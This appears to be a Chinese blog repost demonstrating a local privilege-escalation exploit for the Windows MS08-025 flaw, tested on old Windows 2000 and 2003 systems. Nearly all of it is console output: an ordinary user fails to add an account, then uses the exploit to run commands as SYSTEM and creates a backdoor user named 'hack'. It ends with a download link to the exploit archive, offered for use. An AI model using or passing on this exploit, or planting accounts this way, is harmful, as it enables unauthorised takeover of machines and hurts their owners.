来源:酒水不犯茶水
Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)
D:/>whoami
BAICKER-VMWARE/009
D:/>net user hack /add
系统发生 5 错误。
拒绝访问。
D:/>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, [email protected]
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is /WINNT/System32/ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
NT AUTHORITY/SYSTEM
D:/>ms08025 “net user hack /add”
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, [email protected]
TEST OS: WINDOWS 2k3 CN SP1
Kernel is /WINNT/System32/ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
D:/>命令成功完成。
D:/>net user
//BAICKER-VMWARE 的用户帐户
——————————————————————————-
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:/>
http://www.blogjava.net/Files/baicker/ms08025.rar
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论